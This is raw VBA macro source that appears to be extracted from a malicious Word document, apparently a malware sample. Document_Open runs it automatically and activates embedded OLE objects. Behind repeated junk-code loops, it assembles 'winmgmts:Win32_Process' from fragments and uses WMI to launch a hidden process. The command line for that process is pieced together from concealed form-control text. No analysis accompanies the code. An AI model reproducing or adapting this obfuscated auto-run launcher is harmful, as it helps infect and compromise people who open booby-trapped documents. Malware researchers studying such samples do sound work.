Attribute VB_Name = "Bvktkpmcp"
Function Gvrewgkb()
   For Febkcapmgqor = Dtmpuwwphqai To 0
      For Ppxtqzleg = Vmeesqwxpz To 0
         Mxdyqwkkuzhxr = (23 + Round(WOJOkxR3))
      Next
      Amjymsgyjrko = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Klitrlvn = uzH To MZDUoaj1
         Hwjovfhnzvvl = ChrB(dANsZ68a4)
         Next
      For Jffzthfi = 0 To 0
         Jozdahznl = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Fgalqfiwcdkn = Vyvqzuvyv.Cqwreudpec
   For Ggfuxnlyp = Istpqcarsxv To 0
      For Mvwczlcpvrkxa = Jtmhrmqvbbyoz To 0
         Kkmhicqi = (23 + Round(WOJOkxR3))
      Next
      Pxmbjrql = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Ylnckvaub = uzH To MZDUoaj1
         Cdshzlsivtlne = ChrB(dANsZ68a4)
         Next
      For Dusjhdxeezw = 0 To 0
         Mbwhxgmutukgx = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Spucpfsgd = Fgalqfiwcdkn + Eqgqcukkqs.Bznaxyfwp + Eqgqcukkqs.Zkvepwts + Eqgqcukkqs.Rygksenvkbp
   For Yeoyziucy = Axzlpxcvtrnh To 0
      For Kgepovubccer = Aynkrmowuqi To 0
         Rqrlxifocp = (23 + Round(WOJOkxR3))
      Next
      Kzyuxhxbnv = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Cptfoloh = uzH To MZDUoaj1
         Dllrgirayj = ChrB(dANsZ68a4)
         Next
      For Gmpbxike = 0 To 0
         Vnjhpazqafbav = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Cvukvxnunvnbd = Spucpfsgd + Eqgqcukkqs.Ydoehzjxowhl + Eqgqcukkqs.Ejxfdtxi.ControlTipText
   For Asddhtgzbw = Cewtwsfwgp To 0
      For Tyxclnzjm = Kmkmcrbh To 0
         Vkvdqjvasfkgy = (23 + Round(WOJOkxR3))
      Next
      Vdooxawfbl = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Fdeeifexnc = uzH To MZDUoaj1
         Dejuqseobego = ChrB(dANsZ68a4)
         Next
      For Izzftsjypwoa = 0 To 0
         Tmvtftkt = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Gvrewgkb = Eeucouafvnce + Cvukvxnunvnbd + Eeucouafvnce
   For Lhgdygaw = Ndlebqrgts To 0
      For Qmhxsotndnnd = Spfruwhxjdv To 0
         Cfobzftruwanm = (23 + Round(WOJOkxR3))
      Next
      Gzphmnybbbx = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Tddbaqrhpm = uzH To MZDUoaj1
         Yxytfdhttqjnn = ChrB(dANsZ68a4)
         Next
      For Denzcgjxqs = 0 To 0
         Wlfrnbknpz = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
End Function
Function Kekzylcfmlzal()
   For Uelqbvidpr = Bohnuerrdblig To 0
      For Kmrsdjzje = Jormgnlcull To 0
         Fcehstdkgox = (23 + Round(WOJOkxR3))
      Next
      Yvnbfdpdvdzqu = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Davypamberqlu = uzH To MZDUoaj1
         Ztviopps = ChrB(dANsZ68a4)
         Next
      For Inkzerxugg = 0 To 0
         Ycxltikoruws = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Qoqtiqet = "wi" + "nmgmt" + "s:" + "Win3" + "2_" + Vyvqzuvyv.Cqwreudpec + "r" + "oc" + "ess" + I
   For Yyvqhuux = Jcnkxdkcnzkf To 0
      For Uqoytaebohj = Ikcpjpky To 0
         Xazavmtt = (23 + Round(WOJOkxR3))
      Next
      Gvqgwemphoga = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Crkjbquprpqxt = uzH To MZDUoaj1
         Punrjxmtwt = ChrB(dANsZ68a4)
         Next
      For Vrpuwfax = 0 To 0
         Kscyrebp = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Set Fsxhtqbmcttq = CreateObject(Qoqtiqet)
   For Tzzpzaknfmmoe = Ulctsbzagyt To 0
      For Uvloitsbfty = Jcsuhxtueur To 0
         Vuysqgits = (23 + Round(WOJOkxR3))
      Next
      Xfklnpse = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Sximrvyw = uzH To MZDUoaj1
         Tacyycmc = ChrB(dANsZ68a4)
         Next
      For Xqrqxbniho = 0 To 0
         Ofcwqgzlkxc = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Tcombooa = Qoqtiqet + Eqgqcukkqs.Dftrfqydwcc.ControlTipText + Eqgqcukkqs.Ebmbegep.ControlTipText
   For Kfkvvknpubh = Vgpsnizrbt To 0
      For Ltqbrzzrmcxzk = Kfqgejcc To 0
         Yrmsxilvvjqwn = (23 + Round(WOJOkxR3))
      Next
      Ibztjpit = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Llmlpjqocsh = uzH To MZDUoaj1
         Otleokkornevi = ChrB(dANsZ68a4)
         Next
      For Skqyfdmxyj = 0 To 0
         Ailkuvcl = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Dotvjnsq = Tcombooa + Vyvqzuvyv.Cqwreudpec
   For Znzjhjjnrwif = Exgwnbfsopzf To 0
      For Zhucbcycaep = Qacidtcwnk To 0
         Lngykjbtv = (23 + Round(WOJOkxR3))
      Next
      Bgdbucxbgw = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Rmgvlmrmxax = uzH To MZDUoaj1
         Rdpvnwncqac = ChrB(dANsZ68a4)
         Next
      For Iupjnitzpmeo = 0 To 0
         Ecmbinmcz = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Set Kekzylcfmlzal = CreateObject(Dotvjnsq)
   For Jbvhenmdz = Asmqjhdgrlxl To 0
      For Nqlktvurpejn = Nchripbveveu To 0
         Cvlpnnrwatgd = (23 + Round(WOJOkxR3))
      Next
      Dhgwajspeg = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Srlqfzlyptst = uzH To MZDUoaj1
         Crbolfqsswoi = ChrB(dANsZ68a4)
         Next
      For Cmrflvuz = 0 To 0
         Ngratjpmxh = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Kekzylcfmlzal.XSize = False
   For Ljcfwseoh = Tcgtjoieho To 0
      For Ezjhcdjqdn = Qobdtpdm To 0
         Isflswzgwtb = (23 + Round(WOJOkxR3))
      Next
      Gnlblyiigyfdv = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Krkyfqqqc = uzH To MZDUoaj1
         Mrxqkzrquq = ChrB(dANsZ68a4)
         Next
      For Snwfbuzhwju = 0 To 0
         Icuhqwika = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Kekzylcfmlzal.YSize = False
   For Leklcstdgt = Htkfuelqzq To 0
      For Gzkwkoxccs = Eklbjxtoq To 0
         Wyjcgerlutbf = (23 + Round(WOJOkxR3))
      Next
      Xssvjgosf = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Skhcxwszen = uzH To MZDUoaj1
         Lrxlggkd = ChrB(dANsZ68a4)
         Next
      For Tmeashbget = 0 To 0
         Nukjxxigxuzr = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Do While Fsxhtqbmcttq.Create(Null & Gvrewgkb, Didilyscvz, Kekzylcfmlzal)
Loop
   For Njsyqmnrmg = Moopkigmgzx To 0
      For Rytovjbjh = Pepmdrzwbcem To 0
         Vwtmfnlnrzn = (23 + Round(WOJOkxR3))
      Next
      Rwlefrua = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Tjoaacemmrya = uzH To MZDUoaj1
         Wcjibnqyj = ChrB(dANsZ68a4)
         Next
      For Aqxzuiqpd = 0 To 0
         Qnlkmmac = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
End Function
Attribute VB_Name = "Eqgqcukkqs"
Attribute VB_Base = "0{5CCACDF6-E318-414A-B1F1-31587089C1E9}{CD173C45-26C5-447D-82E1-47F1B2F6943D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Vyvqzuvyv"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Cqwreudpec, 0, 0, MSForms, TextBox"
Private Sub Document_Open()
        Dim varObj As Variant
        For Each varObj In ActiveDocument.InlineShapes
        If varObj.Type = wdInlineShapeEmbeddedOLEObject Then
        varObj.OLEFormat.Activate
        End If
        Next varObj
        Dim c As String
        For Each varObj In ActiveDocument.Shapes
        If varObj.Type = msoEmbeddedOLEObject Then
        varObj.OLEFormat.Activate
        End If
        Next varObj
        End Sub
Private Sub Document_Open()
   For Nehjkaim = Mplkjouk To 0
      For Soignsrc = Syhpjurvr To 0
         Ederxwdu = (23 + Round(WOJOkxR3))
      Next
      Vasjzvavsifhz = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Ivapwytobol = uzH To MZDUoaj1
         Qvoibjwxogk = ChrB(dANsZ68a4)
         Next
      For Ayuvxdscpad = 0 To 0
         Zclrvnrle = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
   For Psimvmgqagtar = Ihhagvdzy To 0
      For Bemxxwsketxji = Bjviscftlbtfd To 0
         Tjxzlcecjx = (23 + Round(WOJOkxR3))
      Next
      Ymlxyriuu = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Wtwkbwdqpit = uzH To MZDUoaj1
         Mjxvxhmkkvg = ChrB(dANsZ68a4)
         Next
      For Duovhrpt = 0 To 0
         Ordffhsyf = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
   For Prokwsaysy = Ibhsmjrhkgem To 0
      For Ngfpxxobrlwbg = Qpzejykjeaxip To 0
         Mbryeusdbx = (23 + Round(WOJOkxR3))
      Next
      Jvwkcnhtr = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Jzdxaozpyb = uzH To MZDUoaj1
         Ujizfxlygdrbn = ChrB(dANsZ68a4)
         Next
      For Uvigshthzbw = 0 To 0
         Biifawbauoc = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Kekzylcfmlzal
End Sub


INQUEST-PP=macro
